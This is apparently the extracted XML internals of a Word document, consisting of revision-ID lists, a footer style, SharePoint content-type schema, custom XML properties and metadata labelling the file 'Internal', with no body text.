    <w:rsid w:val="0337471F"/>
    <w:rsid w:val="038BE099"/>
    <w:rsid w:val="03CF11A0"/>
    <w:rsid w:val="043F5FA2"/>
    <w:rsid w:val="04762DEA"/>
    <w:rsid w:val="04B97FC6"/>
    <w:rsid w:val="06059B09"/>
    <w:rsid w:val="060DEF54"/>
    <w:rsid w:val="061658D0"/>
    <w:rsid w:val="0620A153"/>
    <w:rsid w:val="0648CA63"/>
    <w:rsid w:val="0654698F"/>
    <w:rsid w:val="07657798"/>
    <w:rsid w:val="080E624F"/>
    <w:rsid w:val="0832C357"/>
    <w:rsid w:val="08DD2C65"/>
    <w:rsid w:val="097860C0"/>
    <w:rsid w:val="098F6758"/>
    <w:rsid w:val="09EB18F5"/>
    <w:rsid w:val="09FA6EB2"/>
    <w:rsid w:val="0A7F1976"/>
    <w:rsid w:val="0ABE0EF6"/>
    <w:rsid w:val="0B24CD4D"/>
    <w:rsid w:val="0B82C5C1"/>
    <w:rsid w:val="0BC4B2DC"/>
    <w:rsid w:val="0C0E135E"/>
    <w:rsid w:val="0C781029"/>
    <w:rsid w:val="0CC41A72"/>
    <w:rsid w:val="0D47F99C"/>
    <w:rsid w:val="0D4AC52A"/>
    <w:rsid w:val="0E483671"/>
    <w:rsid w:val="0EE6BAD4"/>
    <w:rsid w:val="101915FF"/>
    <w:rsid w:val="1021C965"/>
    <w:rsid w:val="1054A1DF"/>
    <w:rsid w:val="105B9C3E"/>
    <w:rsid w:val="10916183"/>
    <w:rsid w:val="10E3623E"/>
    <w:rsid w:val="1113DB83"/>
    <w:rsid w:val="1129206D"/>
    <w:rsid w:val="11B16542"/>
    <w:rsid w:val="1247B036"/>
    <w:rsid w:val="12B84639"/>
    <w:rsid w:val="1310FEE8"/>
    <w:rsid w:val="13847A30"/>
    <w:rsid w:val="13893790"/>
    <w:rsid w:val="138B708A"/>
    <w:rsid w:val="13BFF919"/>
    <w:rsid w:val="13F4EA3B"/>
    <w:rsid w:val="1430D089"/>
    <w:rsid w:val="145049B9"/>
    <w:rsid w:val="1514E0CC"/>
    <w:rsid w:val="156CDD28"/>
    <w:rsid w:val="164806F5"/>
    <w:rsid w:val="17E8B956"/>
    <w:rsid w:val="182307D5"/>
    <w:rsid w:val="197D9C94"/>
    <w:rsid w:val="1A26676D"/>
    <w:rsid w:val="1AC410B6"/>
    <w:rsid w:val="1B0A8990"/>
    <w:rsid w:val="1B399D5C"/>
    <w:rsid w:val="1BC27382"/>
    <w:rsid w:val="1BEEDACD"/>
    <w:rsid w:val="1C6BE832"/>
    <w:rsid w:val="1C97C6B7"/>
    <w:rsid w:val="1D1E243C"/>
    <w:rsid w:val="1DCC2C66"/>
    <w:rsid w:val="1EF38D8E"/>
    <w:rsid w:val="1FD6CD90"/>
    <w:rsid w:val="2034AE6A"/>
    <w:rsid w:val="203FB93D"/>
    <w:rsid w:val="20A81079"/>
    <w:rsid w:val="20C24DDA"/>
    <w:rsid w:val="20F42B6F"/>
    <w:rsid w:val="20FC25ED"/>
    <w:rsid w:val="21181413"/>
    <w:rsid w:val="2216C9D1"/>
    <w:rsid w:val="227EBFEA"/>
    <w:rsid w:val="2320D504"/>
    <w:rsid w:val="23A9F40F"/>
    <w:rsid w:val="24356835"/>
    <w:rsid w:val="243FE6A9"/>
    <w:rsid w:val="2556F2A7"/>
    <w:rsid w:val="25854978"/>
    <w:rsid w:val="25D240ED"/>
    <w:rsid w:val="25FE64BB"/>
    <w:rsid w:val="2689CDEA"/>
    <w:rsid w:val="26FCFC16"/>
    <w:rsid w:val="2701A732"/>
    <w:rsid w:val="276631BD"/>
    <w:rsid w:val="27E87659"/>
    <w:rsid w:val="27FBD6FA"/>
    <w:rsid w:val="295EF59A"/>
    <w:rsid w:val="29DFECB3"/>
    <w:rsid w:val="2A47B890"/>
    <w:rsid w:val="2A7C5D00"/>
    <w:rsid w:val="2B0F4680"/>
    <w:rsid w:val="2B319A5D"/>
    <w:rsid w:val="2B831235"/>
    <w:rsid w:val="2BA567EB"/>
    <w:rsid w:val="2C0617BD"/>
    <w:rsid w:val="2C2731D6"/>
    <w:rsid w:val="2C850D8F"/>
    <w:rsid w:val="2D22B823"/>
    <w:rsid w:val="2D6CBFDE"/>
    <w:rsid w:val="2DC5B447"/>
    <w:rsid w:val="2DE9AC5D"/>
    <w:rsid w:val="2F1419BE"/>
    <w:rsid w:val="2F406BAA"/>
    <w:rsid w:val="301A0CC1"/>
    <w:rsid w:val="30A20AD3"/>
    <w:rsid w:val="30BCDA81"/>
    <w:rsid w:val="30DD4D52"/>
    <w:rsid w:val="30DF0EFB"/>
    <w:rsid w:val="3173BF89"/>
    <w:rsid w:val="31EA593A"/>
    <w:rsid w:val="32C34B3E"/>
    <w:rsid w:val="3302ADF5"/>
    <w:rsid w:val="337D2908"/>
    <w:rsid w:val="33E57807"/>
    <w:rsid w:val="33F3DB19"/>
    <w:rsid w:val="34194748"/>
    <w:rsid w:val="341E93E4"/>
    <w:rsid w:val="34482CF5"/>
    <w:rsid w:val="346C56FE"/>
    <w:rsid w:val="349189A8"/>
    <w:rsid w:val="355DAC06"/>
    <w:rsid w:val="35DA3729"/>
    <w:rsid w:val="36542C7E"/>
    <w:rsid w:val="3701973D"/>
    <w:rsid w:val="39065459"/>
    <w:rsid w:val="3953A015"/>
    <w:rsid w:val="39E283FE"/>
    <w:rsid w:val="39EB23D6"/>
    <w:rsid w:val="3A18BC48"/>
    <w:rsid w:val="3A5AE9E3"/>
    <w:rsid w:val="3AEFFEE7"/>
    <w:rsid w:val="3AFB6620"/>
    <w:rsid w:val="3B23816B"/>
    <w:rsid w:val="3BF12F61"/>
    <w:rsid w:val="3C11BC90"/>
    <w:rsid w:val="3C250E80"/>
    <w:rsid w:val="3D15AE91"/>
    <w:rsid w:val="3D523DBC"/>
    <w:rsid w:val="3D6788CB"/>
    <w:rsid w:val="3E3B7C16"/>
    <w:rsid w:val="3F097B7C"/>
    <w:rsid w:val="3F5B3AD5"/>
    <w:rsid w:val="3F9CFF3E"/>
    <w:rsid w:val="4086484A"/>
    <w:rsid w:val="412928CC"/>
    <w:rsid w:val="4187A8EE"/>
    <w:rsid w:val="420C13FF"/>
    <w:rsid w:val="430A61ED"/>
    <w:rsid w:val="434DBE32"/>
    <w:rsid w:val="4380892C"/>
    <w:rsid w:val="43ECE450"/>
    <w:rsid w:val="447C5D1F"/>
    <w:rsid w:val="45977647"/>
    <w:rsid w:val="45BD597F"/>
    <w:rsid w:val="45CB530B"/>
    <w:rsid w:val="4674467A"/>
    <w:rsid w:val="47A2ABE5"/>
    <w:rsid w:val="47BDDDD8"/>
    <w:rsid w:val="47D794CF"/>
    <w:rsid w:val="47F7BC99"/>
    <w:rsid w:val="487C8211"/>
    <w:rsid w:val="488C76C1"/>
    <w:rsid w:val="4972A248"/>
    <w:rsid w:val="4A1C9FDC"/>
    <w:rsid w:val="4A461BBC"/>
    <w:rsid w:val="4A5F19A5"/>
    <w:rsid w:val="4A75DE6A"/>
    <w:rsid w:val="4AFA6CCC"/>
    <w:rsid w:val="4B2AE39D"/>
    <w:rsid w:val="4B3C3EBD"/>
    <w:rsid w:val="4B88E672"/>
    <w:rsid w:val="4BC14871"/>
    <w:rsid w:val="4C140DB9"/>
    <w:rsid w:val="4C735458"/>
    <w:rsid w:val="4D561B46"/>
    <w:rsid w:val="4DC80B99"/>
    <w:rsid w:val="4EED38FF"/>
    <w:rsid w:val="4F650F1E"/>
    <w:rsid w:val="500F10D4"/>
    <w:rsid w:val="50346805"/>
    <w:rsid w:val="503B4906"/>
    <w:rsid w:val="50649B1A"/>
    <w:rsid w:val="506ACC7F"/>
    <w:rsid w:val="507F151E"/>
    <w:rsid w:val="50E4E300"/>
    <w:rsid w:val="50E5CA21"/>
    <w:rsid w:val="513C8F3A"/>
    <w:rsid w:val="517A54E7"/>
    <w:rsid w:val="517F777B"/>
    <w:rsid w:val="5190A203"/>
    <w:rsid w:val="519A7607"/>
    <w:rsid w:val="51CA6C03"/>
    <w:rsid w:val="51F9FE6E"/>
    <w:rsid w:val="52114F12"/>
    <w:rsid w:val="52463C5E"/>
    <w:rsid w:val="52C8E507"/>
    <w:rsid w:val="53FC3B3A"/>
    <w:rsid w:val="541275BC"/>
    <w:rsid w:val="546CC0B9"/>
    <w:rsid w:val="54BF481A"/>
    <w:rsid w:val="55297C40"/>
    <w:rsid w:val="553170BF"/>
    <w:rsid w:val="57010839"/>
    <w:rsid w:val="5757F567"/>
    <w:rsid w:val="57B4E714"/>
    <w:rsid w:val="57CAFAAF"/>
    <w:rsid w:val="57D6AAD3"/>
    <w:rsid w:val="57E9E157"/>
    <w:rsid w:val="58297D41"/>
    <w:rsid w:val="59558A88"/>
    <w:rsid w:val="5AF05E47"/>
    <w:rsid w:val="5BC3136C"/>
    <w:rsid w:val="5C2E21E9"/>
    <w:rsid w:val="5CE9FFBE"/>
    <w:rsid w:val="5D0C0E35"/>
    <w:rsid w:val="5D1EDEA1"/>
    <w:rsid w:val="5DE5541A"/>
    <w:rsid w:val="5DE93620"/>
    <w:rsid w:val="5DEBDC68"/>
    <w:rsid w:val="5DFD3A73"/>
    <w:rsid w:val="5E15253C"/>
    <w:rsid w:val="5E3590FF"/>
    <w:rsid w:val="5E9ADFD9"/>
    <w:rsid w:val="5F76BA4A"/>
    <w:rsid w:val="5FD63FE5"/>
    <w:rsid w:val="60D2835B"/>
    <w:rsid w:val="60E2969E"/>
    <w:rsid w:val="60E89F61"/>
    <w:rsid w:val="61F7959F"/>
    <w:rsid w:val="6218C8CD"/>
    <w:rsid w:val="624CC4B9"/>
    <w:rsid w:val="62A44CF7"/>
    <w:rsid w:val="631360BD"/>
    <w:rsid w:val="63179944"/>
    <w:rsid w:val="63BD8DFF"/>
    <w:rsid w:val="641743D3"/>
    <w:rsid w:val="645F80E0"/>
    <w:rsid w:val="64A5F56B"/>
    <w:rsid w:val="6572C511"/>
    <w:rsid w:val="659611B0"/>
    <w:rsid w:val="65FDDFB3"/>
    <w:rsid w:val="6601C8DC"/>
    <w:rsid w:val="660FB618"/>
    <w:rsid w:val="66588249"/>
    <w:rsid w:val="66C1BE47"/>
    <w:rsid w:val="66D70FA6"/>
    <w:rsid w:val="67E59C76"/>
    <w:rsid w:val="67ECCD64"/>
    <w:rsid w:val="67F36026"/>
    <w:rsid w:val="68330786"/>
    <w:rsid w:val="68BF2ED8"/>
    <w:rsid w:val="68ED0C03"/>
    <w:rsid w:val="695A8474"/>
    <w:rsid w:val="69C0B4EE"/>
    <w:rsid w:val="6A1E288A"/>
    <w:rsid w:val="6A38582C"/>
    <w:rsid w:val="6AE2E3EB"/>
    <w:rsid w:val="6B2E31AC"/>
    <w:rsid w:val="6B7B82CF"/>
    <w:rsid w:val="6B814AD6"/>
    <w:rsid w:val="6BA74EB1"/>
    <w:rsid w:val="6C42F3F5"/>
    <w:rsid w:val="6D5BF6B2"/>
    <w:rsid w:val="6D6358F7"/>
    <w:rsid w:val="6D96179E"/>
    <w:rsid w:val="6DCB76B1"/>
    <w:rsid w:val="6DDEC064"/>
    <w:rsid w:val="6E8EF8D2"/>
    <w:rsid w:val="6F814725"/>
    <w:rsid w:val="6F9C6E09"/>
    <w:rsid w:val="6FCDBA2F"/>
    <w:rsid w:val="7063670A"/>
    <w:rsid w:val="71180FE4"/>
    <w:rsid w:val="7130AE3D"/>
    <w:rsid w:val="7195DF68"/>
    <w:rsid w:val="71FDB6B3"/>
    <w:rsid w:val="7277C430"/>
    <w:rsid w:val="72C85AA5"/>
    <w:rsid w:val="739E8FB4"/>
    <w:rsid w:val="73D0C7ED"/>
    <w:rsid w:val="741421FC"/>
    <w:rsid w:val="763B3B9B"/>
    <w:rsid w:val="7670C81E"/>
    <w:rsid w:val="767F4915"/>
    <w:rsid w:val="775B8B8C"/>
    <w:rsid w:val="776D2378"/>
    <w:rsid w:val="77B602A9"/>
    <w:rsid w:val="77CD0E2D"/>
    <w:rsid w:val="77D70C78"/>
    <w:rsid w:val="77F9705F"/>
    <w:rsid w:val="78097F1A"/>
    <w:rsid w:val="782156B5"/>
    <w:rsid w:val="787E0581"/>
    <w:rsid w:val="78FE4BEF"/>
    <w:rsid w:val="79203A93"/>
    <w:rsid w:val="7950C66C"/>
    <w:rsid w:val="79A47C21"/>
    <w:rsid w:val="79D46DCB"/>
    <w:rsid w:val="7A56F397"/>
    <w:rsid w:val="7A868ED3"/>
    <w:rsid w:val="7AA4182A"/>
    <w:rsid w:val="7C159251"/>
    <w:rsid w:val="7E9E4FD4"/>
    <w:rsid w:val="7EAFB98F"/>
    <w:rsid w:val="7EC78E3B"/>
    <w:rsid w:val="7EEFAAC3"/>
    <w:rsid w:val="7F09B208"/>
    <w:rsid w:val="7F24558A"/>
    <w:rsid w:val="7F6D6CDE"/>
    <w:rsid w:val="7FAB4E49"/>
    <w:rsid w:val="7FC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B1FE"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{8639D607-7977-4680-8EC5-DF7F74A7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2CE5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820"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="FooterChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00E92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4088a6-11d5-4c61-ad92-cf8c57084f7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1C2B02FAD27245836BDB9564DCB762" ma:contentTypeVersion="17" ma:contentTypeDescription="Create a new document." ma:contentTypeScope="" ma:versionID="c31ad8a20e3b0211ccbed40a4c4b4804">
  <xsd:schema xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:p="http://schemas.microsoft.com/office/2006/metadata/properties" xmlns:ns3="05a65ac4-8513-4486-96f7-5aca514ffe2b" xmlns:ns4="b14088a6-11d5-4c61-ad92-cf8c57084f76" targetNamespace="http://schemas.microsoft.com/office/2006/metadata/properties" ma:root="true" ma:fieldsID="e5be3ce0a1a8bc7932ffaf0886a477f9" ns3:_="" ns4:_="">
    <xsd:import namespace="05a65ac4-8513-4486-96f7-5aca514ffe2b"/>
    <xsd:import namespace="b14088a6-11d5-4c61-ad92-cf8c57084f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5ac4-8513-4486-96f7-5aca514ffe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088a6-11d5-4c61-ad92-cf8c5708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6B7F91-9761-4EC9-B2BC-1F40BDC19067}">
  <ds:schemaRefs>
    <ds:schemaRef ds:uri="http://schemas.microsoft.com/office/2006/metadata/properties"/>
    <ds:schemaRef ds:uri="http://schemas.microsoft.com/office/infopath/2007/PartnerControls"/>
    <ds:schemaRef ds:uri="b14088a6-11d5-4c61-ad92-cf8c57084f76"/>
  </ds:schemaRefs>
</ds:datastoreItem>
</file>

<file path=customXml/itemProps2.xml><?xml version="1.0" encoding="utf-8"?>
<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{32742D7B-E020-443B-8B35-7A77037E8F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EB56B-5422-4A48-A813-2C8194AF0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5ac4-8513-4486-96f7-5aca514ffe2b"/>
    <ds:schemaRef ds:uri="b14088a6-11d5-4c61-ad92-cf8c57084f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Rory Coulter</cp:lastModifiedBy>
  <cp:revision>5</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-09-30T07:40:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-10-23T21:35:00Z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0x0101000F1C2B02FAD27245836BDB9564DCB762</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="3" name="ClassificationContentMarkingHeaderShapeIds">
    <vt:lpwstr>54f40e1,7c2595f1,3c01d65e</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="4" name="ClassificationContentMarkingHeaderFontProps">
    <vt:lpwstr>#000000,12,Aptos</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="5" name="ClassificationContentMarkingHeaderText">
    <vt:lpwstr>Internal</vt:lpwstr>
  </property>
</Properties>
</file>